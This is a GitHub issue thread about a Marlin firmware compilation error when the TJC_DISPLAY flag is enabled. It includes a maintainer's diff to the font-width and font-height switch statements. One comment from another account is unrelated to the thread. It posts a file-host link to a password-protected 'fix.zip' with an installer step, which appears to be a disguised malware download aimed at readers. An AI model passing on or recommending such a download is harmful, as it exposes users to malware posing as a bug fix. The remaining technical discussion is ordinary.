MarlinFirmware/Marlin #27374: [BUG] TJC_DISPLAY flag breaks compilation

IngilizAdam, 2024-08-29:
### Did you test the latest `bugfix-2.1.x` code?

Yes, and the problem still exists.

### Bug Description

Lines 33-39 in the file dwin_font.h causes compilation to fail when TJC_DISPLAY flag is active. (Also the TJC Display is not working right with my Ender-3 Max Neo after following the Special_Compilation steps, may be related to this issue.)

### Expected behavior

Needs definitions of the font macros for else statement.

### Actual behavior

It doesn't set font macros for else statement.

### Steps to Reproduce

1. Add:
```
#define DWIN_LCD_PROUI
#define TJC_DISPLAY
```
lines to the Configuration.h file.
2. Build
3. Compilation Error

### Version of Marlin Firmware

2.1.3

### Printer model

Ender-3 Max Neo

### Electronics

Stock

### LCD/Controller

TJC Display

### Bed Leveling

None

### Your Slicer

None

### Host Software

None

### Don't forget to include

- [X] A ZIP file containing your `Configuration.h` and `Configuration_adv.h`.

### Additional information & file uploads

[Configuration.zip](https://github.com/user-attachments/files/16791294/Configuration.zip)

I have tried compiling with removing the ```#if DISABLED(TJC_DISPLAY)``` statement. It compiled but the screen is not working right. I uploaded a photo of the result.

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ellensp, 2024-08-29:
This fixes that error

```DIFF
diff --git a/Marlin/src/lcd/e3v2/common/dwin_api.cpp b/Marlin/src/lcd/e3v2/common/dwin_api.cpp
index 1688b24230..4a93d304ca 100644
--- a/Marlin/src/lcd/e3v2/common/dwin_api.cpp
+++ b/Marlin/src/lcd/e3v2/common/dwin_api.cpp
@@ -93,16 +93,18 @@ bool dwinHandshake() {
 // Get font character width
 uint8_t fontWidth(uint8_t cfont) {
   switch (cfont) {
-    case font6x12 : return 6;
+    #if DISABLED(TJC_DISPLAY)
+      case font6x12 : return 6;
+      case font20x40: return 20;
+      case font24x48: return 24;
+      case font28x56: return 28;
+      case font32x64: return 32;
+    #endif
     case font8x16 : return 8;
     case font10x20: return 10;
     case font12x24: return 12;
     case font14x28: return 14;
     case font16x32: return 16;
-    case font20x40: return 20;
-    case font24x48: return 24;
-    case font28x56: return 28;
-    case font32x64: return 32;
     default: return 0;
   }
 }
@@ -110,16 +112,18 @@ uint8_t fontWidth(uint8_t cfont) {
 // Get font character height
 uint8_t fontHeight(uint8_t cfont) {
   switch (cfont) {
-    case font6x12 : return 12;
+    #if DISABLED(TJC_DISPLAY)
+      case font6x12 : return 12;
+      case font20x40: return 40;
+      case font24x48: return 48;
+      case font28x56: return 56;
+      case font32x64: return 64;
+    #endif
     case font8x16 : return 16;
     case font10x20: return 20;
     case font12x24: return 24;
     case font14x28: return 28;
     case font16x32: return 32;
-    case font20x40: return 40;
-    case font24x48: return 48;
-    case font28x56: return 56;
-    case font32x64: return 64;
     default: return 0;
   }
 }

```

Basically in https://github.com/MarlinFirmware/Marlin/pull/26003
the following fonts are removed from TJC_DISPLAYs (probably as it doesn't support them)
  #define font6x12  0x00
  #define font20x40 0x06
  #define font24x48 0x07
  #define font28x56 0x08
  #define font32x64 0x09

ellensp, 2024-08-29:
I've created a PR to fix this compile error.

IngilizAdam, 2024-08-29:
This solved the compilation issue however the screen issue is still happening. Maybe the TJC_UPDATE needs an update for the Ender-3 Max Neo. Or my configuration files are missing some statements?

[image]

closed 2024-09-12 by thinkyhead